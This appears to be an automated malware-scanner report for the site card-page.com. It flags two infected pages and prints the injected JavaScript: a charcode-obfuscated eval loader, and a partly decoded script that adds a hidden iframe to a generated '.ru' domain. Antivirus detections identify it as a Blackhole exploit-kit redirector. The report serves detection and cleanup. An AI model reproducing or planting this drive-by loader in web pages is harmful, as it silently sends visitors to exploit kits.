New scan:

Malware Scanner report for card-page.com

Malicious/Suspicious/Total urls checked
2/0/13
2 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "card-page.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=card-page.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://card-page.com/
200 OK
Content-Length: 20632
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

window.eval(String.fromCharCode(105,61,48,59,116,114,121,123,112,114,111,116,111,116,121,112,101,45,53,59,125,99,97,116,99,104,40,122,41,123,102,61,91,49,48,50,44,50,51,52,44,49,49,48,44,49,57,56,44,49,49,54,44,50,49,48,44,49,49,49,44,50,50,48,44,51,50,44,50,50,48,44,49,48,49,44,50,52,48,44,49,49,54,44,49,54,52,44,57,55,44,50,50,48,44,49,48,48,44,50,50,50,44,49,48,57,44,49,53,54,44,49,49,55,44,50,49,56,44,57,56,44,50,48,50,44,49,49,52,44,56,48,44,52,49,44,50,52,54,44,49,49,56,44,49,57,52,44,49,4
... 3000 bytes are skipped ...
04,105,108,100,40,113,43,34,34,41,59,125,99,97,116,99,104,40,102,119,98,101,119,101,41,123,119,61,102,59,115,61,91,93,59,125,13,10,114,61,83,116,114,105,110,103,59,122,61,40,40,101,41,63,34,67,111,100,101,34,58,34,34,41,59,102,111,114,40,59,49,51,51,51,45,53,43,53,62,105,59,105,43,61,49,41,123,106,61,105,59,105,102,40,101,41,115,61,115,43,114,46,102,114,111,109,67,104,97,114,67,111,100,101,40,40,119,91,106,93,47,40,50,45,49,43,106,37,50,41,41,41,59,125,13,10,105,102,40,102,41,101,40,115,41,59));

Decoded script:


i=0;try{prototype-5;}catch(z){f=[102,234,110,198,116,210,111,220,32,220,101,240,116,164,97,220,100,222,109,156,117,218,98,202,114,80,41,246,118,194,114,64,104,210,61,232,104,210,115,92,115,202,101,200,47,232,104,210,115,92,81,118,118,194,114,64,108,222,61,232,104,210,115,92,115,202,101,200,37,232,104,210,115,92,81,118,118,194,114,64,116,202,115,232,61,232,104,210,115,92,65,84,108,222,45,232,104,210,115,92,82,84,104,210,59,210,102,80,116,202,115,232,62,96,41,246,116,208,105,230,46,230,101,20
... 13425 bytes are skipped ...
.round(+ new Date / 1000);
var domainName = generatePseudoRandomString(unix, 16, "ru");
ifrm = document.createElement("IFRAME");
ifrm.setAttribute("src", "http://" + domainName + "/runforestrun?sid=cx");
ifrm.style.width = "0px";
ifrm.style.height = "0px";
ifrm.style.visibility = "hidden";
document.body.appendChild(ifrm);
}
} catch (e) {
}
}, 500 */

Antivirus reports:

AntiVir
JS/BlacoleRef.BO.2
Avast
JS:Iframe-QG [Trj]
Ikarus
Trojan.JS.Blacole
Rising
Trojan.Script.JS.BlacoleRef.e
nProtect
Trojan.JS.Agent.GLM
K7AntiVirus
Trojan
Emsisoft
Trojan.JS.Agent.GLM (B)
Comodo
Exploit.JS.Blacole.DQ
DrWeb
Exploit.BlackHole.51
Kaspersky
Trojan.JS.Iframe.abm
Microsoft
Trojan:JS/BlacoleRef.BO
MicroWorld-eScan
Trojan.JS.Agent.GLM
Jiangmin
Trojan/Script.Gen
NANO-Antivirus
Trojan.Script.Expack.vtxhd
F-Secure
Trojan.JS.Agent.GLM
F-Prot
JS/Blacole.BV
AVG
JS/Agent
GData
Trojan.JS.Agent.GLM
Commtouch
JS/Blacole.BV
BitDefender
Trojan.JS.Agent.GLM

http://card-page.com/about.html
200 OK
Content-Length: 8711
Content-Type: text/html
clean
http://card-page.com/GeneratedItems/CSScriptLib.js
200 OK
Content-Length: 74417
Content-Type: application/x-javascript
clean
http://card-page.com/whatsnew.html
200 OK
Content-Length: 8444
Content-Type: text/html
clean
http://card-page.com/wantlist.html
200 OK
Content-Length: 15696
Content-Type: text/html
clean
http://card-page.com/SpryMenuBar.js
404 Not Found
Content-Length: 290
Content-Type: text/html
clean
http://card-page.com/test404page.js
404 Not Found
Content-Length: 290
Content-Type: text/html
clean
http://card-page.com/hockey.html
200 OK
Content-Length: 6294
Content-Type: text/html
clean
http://card-page.com/SpryAssets/SpryMenuBar.js
200 OK
Content-Length: 9732
Content-Type: application/x-javascript
clean
http://card-page.com/index.html
200 OK
Content-Length: 20632
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

window.eval(String.fromCharCode(105,61,48,59,116,114,121,123,112,114,111,116,111,116,121,112,101,45,53,59,125,99,97,116,99,104,40,122,41,123,102,61,91,49,48,50,44,50,51,52,44,49,49,48,44,49,57,56,44,49,49,54,44,50,49,48,44,49,49,49,44,50,50,48,44,51,50,44,50,50,48,44,49,48,49,44,50,52,48,44,49,49,54,44,49,54,52,44,57,55,44,50,50,48,44,49,48,48,44,50,50,50,44,49,48,57,44,49,53,54,44,49,49,55,44,50,49,56,44,57,56,44,50,48,50,44,49,49,52,44,56,48,44,52,49,44,50,52,54,44,49,49,56,44,49,57,52,44,49,4
... 3000 bytes are skipped ...
04,105,108,100,40,113,43,34,34,41,59,125,99,97,116,99,104,40,102,119,98,101,119,101,41,123,119,61,102,59,115,61,91,93,59,125,13,10,114,61,83,116,114,105,110,103,59,122,61,40,40,101,41,63,34,67,111,100,101,34,58,34,34,41,59,102,111,114,40,59,49,51,51,51,45,53,43,53,62,105,59,105,43,61,49,41,123,106,61,105,59,105,102,40,101,41,115,61,115,43,114,46,102,114,111,109,67,104,97,114,67,111,100,101,40,40,119,91,106,93,47,40,50,45,49,43,106,37,50,41,41,41,59,125,13,10,105,102,40,102,41,101,40,115,41,59));

Decoded script:


i=0;try{prototype-5;}catch(z){f=[102,234,110,198,116,210,111,220,32,220,101,240,116,164,97,220,100,222,109,156,117,218,98,202,114,80,41,246,118,194,114,64,104,210,61,232,104,210,115,92,115,202,101,200,47,232,104,210,115,92,81,118,118,194,114,64,108,222,61,232,104,210,115,92,115,202,101,200,37,232,104,210,115,92,81,118,118,194,114,64,116,202,115,232,61,232,104,210,115,92,65,84,108,222,45,232,104,210,115,92,82,84,104,210,59,210,102,80,116,202,115,232,62,96,41,246,116,208,105,230,46,230,101,20
... 13425 bytes are skipped ...
.round(+ new Date / 1000);
var domainName = generatePseudoRandomString(unix, 16, "ru");
ifrm = document.createElement("IFRAME");
ifrm.setAttribute("src", "http://" + domainName + "/runforestrun?sid=cx");
ifrm.style.width = "0px";
ifrm.style.height = "0px";
ifrm.style.visibility = "hidden";
document.body.appendChild(ifrm);
}
} catch (e) {
}
}, 500 */

Antivirus reports:

AntiVir
JS/BlacoleRef.BO.2
Avast
JS:Iframe-QG [Trj]
Ikarus
Trojan.JS.Blacole
Rising
Trojan.Script.JS.BlacoleRef.e
nProtect
Trojan.JS.Agent.GLM
K7AntiVirus
Trojan
Emsisoft
Trojan.JS.Agent.GLM (B)
Comodo
Exploit.JS.Blacole.DQ
DrWeb
Exploit.BlackHole.51
Kaspersky
Trojan.JS.Iframe.abm
Microsoft
Trojan:JS/BlacoleRef.BO
MicroWorld-eScan
Trojan.JS.Agent.GLM
Jiangmin
Trojan/Script.Gen
NANO-Antivirus
Trojan.Script.Expack.vtxhd
F-Secure
Trojan.JS.Agent.GLM
F-Prot
JS/Blacole.BV
AVG
JS/Agent
GData
Trojan.JS.Agent.GLM
Commtouch
JS/Blacole.BV
BitDefender
Trojan.JS.Agent.GLM

http://card-page.com/links.html
200 OK
Content-Length: 9766
Content-Type: text/html
clean
http://card-page.com/vintage.html
404 Not Found
Content-Length: 288
Content-Type: text/html
clean
http://card-page.com/modano.html
404 Not Found
Content-Length: 287
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: card-page.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 20:09:32 GMT
Accept-Ranges: bytes
ETag: "6138030-5098-b0105a80"
Server: Apache/2.2.3 (CentOS)
Content-Length: 20632
Content-Type: text/html
Last-Modified: Thu, 28 Jun 2012 01:59:54 GMT
Set-Cookie: PHP_SESSION_ID=437041583; expires=Thu 25-Dec-2014 20:14:32 GMT; path=/
X-Powered-By: PleskLin

...20632 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: card-page.com
Referer: http://www.google.com/search?q=card-page.com

Result:
The result is similar to the first query. There are no suspicious redirects found.